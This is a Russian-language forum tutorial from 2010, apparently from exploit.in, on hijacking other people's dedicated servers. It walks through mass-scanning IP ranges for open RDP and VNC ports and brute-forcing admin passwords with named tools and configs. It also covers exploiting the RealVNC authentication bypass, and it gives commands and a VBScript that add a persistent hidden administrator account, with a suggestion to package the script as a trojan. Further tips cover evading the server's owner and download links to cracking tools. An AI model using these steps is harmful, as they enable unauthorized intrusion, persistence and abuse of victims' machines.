Брут дедов (Dedicated Server) - подробная инструкция

Как зайти не дедик?
Подключиться к дедику можно с помошью встроеного в ОС windows утилиты: Подключение к удаленному рабочему столу. Пуск => Программы => Стандартные => Связь => Подключение к удаленному рабочему столу. Можно еще так: Пуск => Выполнить => mstsc. Еще одно утилита для подключение к дедику - это [BL4CK] VNC Viewer: Authentication Bypass. Просто запусти ее и вводи ip адрес дедика. Можно еще Радмином юзать дедик если он установлен на дедике.

Как создать нового пользователя?
Нажмите Win-R, вводим cmd.exe, туда через Clipboard копируем следующие строки
PHP код:
net user имя пароль /add
net localgroup Administrators имя /add
net localgroup "Remote Desktop Users" имя /add
net accounts /maxpwage:unlimited
exit

На специфичных дедах типа Китая, Германии, Иордании, Австрии, Болгарии для определения групы Администраторов (куда нам надо добавится), используем команду net localgroup. Группы администраторов могут иметь имя "Администраторы", "Administradores", "Administrateur" и прочее.
Альтернатива создание пользователя, локального администраторачерез VBsсriрt. Текст скопировать в текстовый файлик, переименовать текстовый файлик в *.vbs .
Скрипт создает локального пользователя "LocalAdmin" с паролем "123456789

PHP код:
Set objNetwork = CreateObject("WScript.Network")
strComputer = objNetwork.ComputerName

Set colAccounts = GetObject("WinNT://" & strComputer & "")
Set objUser = colAccounts.Create("user", "LocalAdmin")
objUser.SetPassword "123456789"
objUser.SetInfo

Set objGroup = GetObject("WinNT://" & strComputer & "/Администраторы,group")
Set objUser = GetObject("WinNT://" & strComputer & "/LocalAdmin,user")
objGroup.Add(objUser.ADsPath)

Const ADS_UF_DONT_EXPIRE_PASSWD = &h10000
UserFlags = objUser.Get("UserFlags")
objPasswordExpirationFlag = UserFlags OR ADS_UF_DONT_EXPIRE_PASSWD
objUser.Put "userFlags", objPasswordExpirationFlag
objUser.SetInfo

Преимущество скрипта - его можно превратить в трой, создающий юзера. Утилит превращения vbs в exe множество - за ними в Гугл.

Как проверить, сидит ли админ за сервером?
Проверить можно так: в Диспетчере задач на последней вкладке смотрим, кто за компом, есть ли сессия Console. Если нет - гуд, иначе - смотрим все задачи, если там есть logon.scr - значит сейчас активна заставка у админа, (часто они не отключают заставку), если нет её - знач надо быть оч акrуратным, сессия мб активна. Еще можно в tsadmin посмотреть, когда кто загружен.

Как залить файлы на дедик?
1. Залей на ФТП мазилу. На какой FTP можно залить файлы? - _http://www.pochta.ru - что-то вроде этого получается ftp : //user.nm.ru @ ftp2.nm.ru/ вводишь свой пароль и вуаля.
2. Когда через mstsc подключаешься,в опциях можно подключить свой винт, кардинально - но скопируешь что надо, потом заливай туда портабельную оперу или лисицу и сиди через них, хотя это когда тупо запрещен доступ в ие, если дело хуже - если нет корпоративного проксика - заливай софт, какой думаешь юзать и юзай, если есть проксик - забей или ищи способ узнать проксики, хотя такой запущенный способ пару раз видел.
П.С. Винт будет виден всем, кто за компом будет, так что скопировал/отключился, вырубил винт. Минимум времени чтобы. Сетевой диск вариант, но надо пояс просчитывать и ночи ждать на деде. Eсли ссылки не открываются то ты в поставь галочку Дисковые устройства в свойствах подключения к удаленному рабочему столу на вкладке Локальные ресурсы, тогда на дедике в моем компьютере появятся твои диски. (Mstsc -- параметры --- локальные рессурсы -- дисковые устройства)

Действовать нужно быстро, иначе спалят ваши похождения на деде

Безопасно ли заходить на дед?
Ответ прост - вы подключаетесь в чужому компьютеру. Это незаконно. Просто используйте proxy, socks (не через браузер, а через систему), а лучше vpn.

Как брутить дедики?

Что нужно для брута?

1. Нужен сканер VNC_Byauth
2. Нужен tss-brute.exe, который идёт вместе с брутом от спайдера, http://ВНИМАНИЕ! Тут должна была быть ссылка на depositfiles.com, скорее всего это вирус или троян!/ru/files/7043875
3. Нужен скрипт на PHP для генерации BAT файлов
4. Прога от RankroR'a для выдирания гудов

По шагам:

1. Открывае cmd.exe (WIN+R), запускаем VNC_Byauth c параметрами -i xxx.xxx.xxx.xxx-yyy.yyy.yyy.yyy -p 3389 -cT -T Кол-во потоков

2. После того как сканер просканил смотрим его лог в блокноте , удаляем из списка :3389 порт оставив просто список IP адресов.

3. Ставим мой скрипт на хост или на localhost и вставляем туда наши айпишнеги и другие данные.

4. После того как скрипт выполнил своё дело создаём в папке с нашим tss-brute.exe , BAT файл и вставляем в него результат полученый после выполнения скрипта.

5. Заходим в файл smclient.ini который шол вместе с tss-brute.exe и вставляем туда такой конфиг

PHP код:
[dlls]
tshare=tclient.dll
;check=tclient.dll
;rs232=rs232kbd.dll
[tclient]
;timeout=120
;contimeout=20
StartRun=ShutDown...
StartRunAct=r
RunBox=Typethenameofaprogram
WinLogon=Options<<
;WinLogonAct=x&u&
WinLogonAct=&u&
PriorWinLogon=Options>>
PriorWinLogonAct=&o&
NTSecurity=ShutDownWindows
NTSecurityAct=pppppl
SureLogoff=Logoff
SureLogoffAct=n
StartLogoff=ppppp72*72n
LogonErrorMessage=LogonMessage
LogonDisabled=Remoteloginsarecurrentlydisabled
LowSpeed=0
PersistentCache=1
;FullScreen=1
;UIClientCaption=Terminal Server Client
;UIDisconnectDialogBox=Terminal Services Client Disconnected
;UIYesNoDisconnect=Disconnect Windows session
ClientImage=mstsc.exe
[clx]
verbose=1
;GlyphEnable=1
и сохраняем.

6. Создаём в той же папке, где лежит наш BAT фаил, папку, которую вы вписывали в скрипте

7. После выполнения Брута, заходим в нашу папку(см п.6) и вставляем в него программу от Rankor'а. Создаём папку outfile и вней outfile.txt

8. Вписываем в программе success , если хоть один дед сбручен, программа вам покажет это, если что-то сбрутилось то смотри outfile.txt там вы увидите IP адресс деда и пароль.

9. Заходим в MSTSC (тобиш RDP) и проверяем наши деды.

Как угнать дедик при помощи ipscan+ntscan?

Итак, нам потребуются следующие программы:
1) Angry ip scanner (проще говоря - ipscan), http://sourceforge.net/projects/ipscan/files/

2) NTScan, скачайте из интернета

3) парсер, можно notepad+ или excel

Во-первых, запускаем ipscan. Что нам нужно? Нам нужно найти как можно больше машин с открытыми 139 и 3389 портами - но мы будем сканить на 3389, чтоб особо время не тратить. После нажатия на кнопку со стрелкой вниз, ставим scan ports и указываем 3389 порт. Далее идем в options-options..., выбираем количество потоков, обязательно ставим Display Only open ports.

Теперь вбиваем нужный диапазон и запускаем. Постепенно будут появляться нужные нам ip. Когда скан закончен, сохраняем отчет в текстовый файл. Это файл будет примерно такой:

PHP код:
This file was generated by Angry IP Scanner
Visit http://www.angryziber.com/ for the latest version

Scanned 62.0.0.0 - 62.0.3.101 (Ports: 3389)
5/23/2008 7:43:38 PM

IP Ping Hostname Open Ports

62.0.1.* 788 ms N/A 3389
62.0.1.* 767 ms N/A 3389
62.0.1.* 752 ms N/A 3389
62.0.2.** 851 ms CBL62-0-2-16.bb.netvision.net.il3389
62.0.2.** 812 ms CBL62-0-2-23.bb.netvision.net.il3389
62.0.2.** 843 ms CBL62-0-2-20.bb.netvision.net.il3389
62.0.2.** 848 ms CBL62-0-2-19.bb.netvision.net.il3389
Для ntscan нам же нужен список, где на каждой строчке написан просто один адрес.
для этого можно использовать notepad+ или любой другой редактор/парсер/MS Excel.

Теперь настал через запустить и NTScan. Ставим отметку на HostFile, указываем наш список, указываем количество потоков, ping host before scan - желательно чтобы стояло, scan host opened port - я не ставлю, так как у нас уже есть список машин с открытым нужным нам портом.

Запускаем и ждем что что-нибудь хорошее сбрутится. При желании можно увеличить словарь, на который брутит NTScan, он находится в файле NT_pass.dic, я добавлял в основном численные значения, был результат - снимал пару раз на 1234567 и на 444.

Можно еще бота поставить на NTScan.txt - это своеобразный гуд, NTScan его дописывает при случае, поэтому вначале он не создается.

Угон дедиков спомощью Dedicate Spyder brute

В данной инструкции описан ещё один способ угона дедиков. Речь пойдёт о бруте админских учёток с помощью Dedicate Spyder brute. Итак, нам понадобятся:

1. Сам Dedicate Spyder brute, найти можно в интернете, введя запрос =)

Приступаем.

1. Берём Angry IP scanner и начинаем скан диапазонов IP на открытый порт 3389 - (RDP). Чем больше начекали айпишников с этим портом, тем нам же лучше!

2. Распаковываем наш Dedicate Spyder brute в какую-нибудь папочку.
Находим в этой папочке файл list.txt и кидаем в него список наших насканенных ай-пи вида:

PHP код:
193.0.121.66
193.17.65.18
193.33.142.18
83.7.64.141
83.7.237.233

Далее, в pass.txt вписываем свой наборчик паролей.
В dict.txt вписываем предпологаемые логины учётки.
В файле options.ini можно прописать аську, на которую будут приходить
пароли:
UIN=0000000 - номер, с которого отправлять
PASS=pass - пароль от этого номера
UinSend=888888 - номер, на который будут приходить пароли.
С настройками бурута закончили.

3. Microsoft Simulated Terminal Server Client tool - без этой софтины работать
ничего не будет... Содержимое пакета нужно распаковать в system32, машины с которой идёт брут! (если пакет не установлен на деде, который будет в списке IP, то брутиться он не будет, к сожалению.. )

4. Теперь запускаем брут и жмём START! Он сам будет открывать окошки RDP и вбивать логины и пароли.

Минусы Dedicate Spyder brute в том, что работает он очень медленно и работает нестабильно на WinXp (лучше использовать его на dedicated server с Win2003 server)

Угон дедиков by Te$t

способ №1

Искать мы будем vnc-server т.е. Virtual Network Computing. Первое, что нам нужно это хороший VNC-сканер, я знаю 2 сканера: это PHP-сканер от Гемаглобина и RealVNC Bypass Authentication Scanner. Свой выбор я оставил за RealVNC Bypass Authentication Scanner, т.к. он прост в использовании и реально ищет по диапазонам, а нам это и нужно. Итак, скачиваем данный сканер, распаковываем его к примеру: X:\XXX\ где Х - буква вашего диска, а ХХХ - папка куда вы его распаковали. И запускаем из cmd.exe Пример:
cd X:\XXX - переходим в папку со сканером
Х:\XXX\VNC.exe - запускаем сканер
где он нам выдаст следущую информацию:

Microsoft Windows XP [Версия 5.1.2600] (С) Корпорация Майкрософт, 1985-2001.
X:\>VNC.exe

================================================[rev-0.0.1]==
========RealVNC <= 4.1.1 Bypass Authentication Scanner=======
============multi-threaded for Linux and Windows=============
================================================== ==[win32]==
MAIN MENU
================================================== ===========

[+] Usage: VNC_bypauth
[-] :
___________________
|___-p____|___-i____|

[-] :
____________________
|___-cT___|___-vnc___|
[-] :
__________________________________________________ ______
|___-v____|___-vv____|___-T___|__-tc___|__-tr___|__-tt___|

[+] Type VNC_bypauth , or for more informations
[+] To increase the speed under linux, try ulimit -s unlimited

X:\>

Осюда мы видим набор ключей по работе со сканером...
Вбиваем далее:
X:\XXX\VNC.exe -i XXX.XXX.XXX.XXX-XXX.XXX.XXX.XXX -p 5900 -vnc
где: -i диапазон ip -р порт -vnc Виртуальные сервера
В то-же время в папке \ХХХ\ у нас появляется файл VNC_bypauth.txt , куда сохраняются все результаты программы. Открываем и видим:
---------------------------------------------------------------------------
COMMAND: VNC.exe -i xxx.xx.xxx.x-xxx.xxx.xxx.xxx -p 5900 -vnc
----------------------------------------------------------------------------
xxx.xx.xxx.xx :5900 vnc4: banned
xxx.xx.xxx.xx :5900 vnc4: nothing received
xxx.xx.xxx.x :5900 connection closed
xxx.xx.xxx.xxx :5900 vnc4: patched
xxx.xx.xxx.xxx :5900 vnc4: VULNERABLE
----------------------------------------------------------------------------
Scan complete
--------------------------------------------[heapoverflow.com 2004-2005]----

из результата видно что сканер понятным образом сохраняет результаты где бажные сервера подписаны как VULNERABLE с такими мы и будем работать... Теперь к нам на помощь приходит программа BL4CK-vncviewer-authbypass она позволяет подключится к бажному серверу, на подобии "Подключение к удаленному рабочему столу" (mstsc.exe)

Способ №2

Ищем и качаем программу DSNS v. 1.0, очень хороший сканер портов. Вбиваем диапазон, порт и ждем... =) через некоторое время сканер выдает нам фуеву тучу открытых портов =). После окончания скана схораняем данный диапазон Results\Export results одним диапазоном без портов. Теперь настала очередь программы VNCMASS в которую мы вбиваем только что насканеные диапазоны и давим Start All прочекает и автоматический подключится к бажным дедикам... Вот и все =)

Советую работать с сканерами через дедики, т.к. вбили диапазон и пошли спать, а на утро подкл. и смотрим результаты.
скачать RealVNC Bypass Authentication Scanner из интернета вбиб запрос или в яндекс или в гугл, как вам удобней.
скачать DSNS v. 1.0 http://update.dsns.net/binaries/dsns123.zip

Интересный софт для брута дедов

VNC-Scanner GUI - удобный GUI с запакованным внутри сканером. Возможности:
- встроенные диапазоны для скана, которые можно распаковать в любой момент
- встроенный парсер
- маленький вес (162 кб)

Использовать так:
VNC.exe
где это флаги -i и -p , где -i это диапазон ip-адресов в таком и только таком ввиде: -i 111.111.111.111-111.111.255.255
а -p - это порт, например -p 3389 или -p 4899 или -p 1,2,3,4,5,10-100,139,1000-2000. Дальше идет (Тип сканирования) Есть два варианта, это либо флаг -cT (TCP connect() ), либо флаг -vnc (Собственно и есть сканер VNC, как в названии). Дальше идут , они же опции, вот какие есть: -v -vv -tc -tr -tt.
Кстати количество потоков нужно подбирать под свою скорость сети (больше 1200 не пробовал).

скачать VNC-Scanner GUI http://multi-up.com/170692

RDP Brute by Stels™
Брутфорс, описание в readme. Особо сложных настроек нет, интиитивно все понятно

скачать RDP Brute by Stels™ http://multi-up.com/170662

RDP Brute by adidas

скачать RDP Brute by adidas http://dump.ru/file/4028447

Dedicated Tools
Программа для работы с дедиками. Собирает следующую информацию:
* CPU
* Объем RAM
* Скорость интернета. Скорость меряется 3 раза на AOL’овском сервере
* Аптайм сервера
* Добавляет пользователя одним кликом
* Копирует всю информацию в буфер обмена одним кликом
Программу необходимо сначала закинуть на дедик! Автор: RankoR

скачать Dedicated Tools http://dump.ru/search/all/DTools

R&D P Brute v3.0
Уникальный брут RDP - он (наконец-то) не использует tss-brute, не является фронт-эндом для какого-либо брута дедиков и не создает никаких лишних окон. Данная версия - сугубо тестовая, однопоточная. Далее предполагается добавить многопоточность и проверку конфигурации сервера, но это будет уже платным
Подключены потоки! (не однопточная)

Перед запуском брута заходим Пуск - Выполнить... и вписываем:
regsvr32.exe mstscax.dll

скачать R&D P Brute v3.0 http://multi-up.com/187241

Ultra RDP
Менеджер выделенных серверов. Неплохая софтинка для работы с дедиками. Довольно удобная. Есть закладка избранное, куда вы можете помещать свои дедики и автоматически коннектится к ним. Все удобно управляется с помощью закладок.
Требуется Framework 2.0, работа не неиже чем на Win XP.

скачать Ultra RDP http://depositfiles.com/ru/files/u1kilh278

mRemote
Самый продвинутый менеджер дедиков. Это целый комбайн с возможность прописывать дополнительные фишки текущего дедика.

Например:
- Выбор разрешения экрана, с возможностью вписать изображение непосредственно в панель, подогнав автоматически размеры
- Возможность указать имя дедика, его описание
- Размещать определенные типы дедиков на разных панелях. Это очень удобно для того что бы распределить свои дедики по странам
- Возможность выбора протокола подключения RDP, VNC, SSH, Telnet и др.
- Возможность консольного подключения
- Возможность выбора переноса локальных принтеров, звуков и т.п.

скачать mRemote v1.50 http://www.mremote.org

Remote Desktop Manager

скачать Remote Desktop Manager http://remotedesktopmanager.com/Home.aspx/Download

EbriBrute

А теперь инструкция по использованию:
1. Для начала поместите папку EbriBrute из архива в удобное вам место.Не важно куда вы её засуните - это никак не скажется на работоспособности брута
2. Откройте папку EbriBrute и зайдите в директорию bin.
3. Найдите файл EbriBrute.exe и запустите его.
4. После запуска,вам необходмо вставить список паролей в поле PASS, и список ip хостов, на которых открыт 3389 порт, в поле ip,например:
PHP код:
192.168.0.1
192.168.1.1
и т.д.
5. После того как пароли и ip вставлены, нажимаем кнопку Сохранить, и после этого можно запускать программу кнопкой EbriBrute!
6. Для того чтобы отпарсить диапазон на наличие открытого 3389 порта, запускаем файл cmd.exe и пишем:
PHP код:
VNC.exe -i 192.168.0.1-192.168.50.255 -p 3389 -cT
далее появится файл - VNC_bypauth.txt который надо открыть блокнотом и убрать “: 3899?, для чего жмём правка ->заменить пишем в поле “что” - : 3389 , а поле “чем” - оставляем пустым. Всё список можно копировать в программу
7. Обращаю ваше внимение,что программа использует логин Administrator, но вы можете поменять настройки, для этого надо заменить слово Administrator в файле start.txt на любой другой логин.
8. Всё! программа готова к использованию!

По окончании работы программы,в папке log будут сохранены логфайлы с именами равнозначными ip адресам пробрученных хостов. В этой папке находится файл Parser.exe, запустив который вы увидите появившийся файл good.txt , где будет указанно внутри каких из логфайлов есть найденный пароль!!!

скачать EbriBrute, mirror http://www.sendspace.com/file/xeb8wq

cRACC
cRACC - программа для создание учетки на деде. Вы просто вводите желаемое имя и пароль, а программа сама создаст учетку.
скачать cRACC http://ineedfile.com/crucc-download

Внимание! Линки на софт проверялись на работоспособность, но не проверялись на вирусы! Я все запускал на виртуальной машине для теста. Будьте осторожны и не запускайте на своих компах, для этих целей есть vmware

Авторство.
Материал писался мной, софт собирался мной. Автором программ не являюсь, в каждой софтине вписан свой автор. Некоторые куски статей или мануалы были взяты с других статей таких авторов: NemeZz, Capcha, dimas, stels™, Ic3, Te$t, ©0.p.т.i.ђ

Автор статьи: zxc (специально для http://exploit.in/forum), 6.02.2010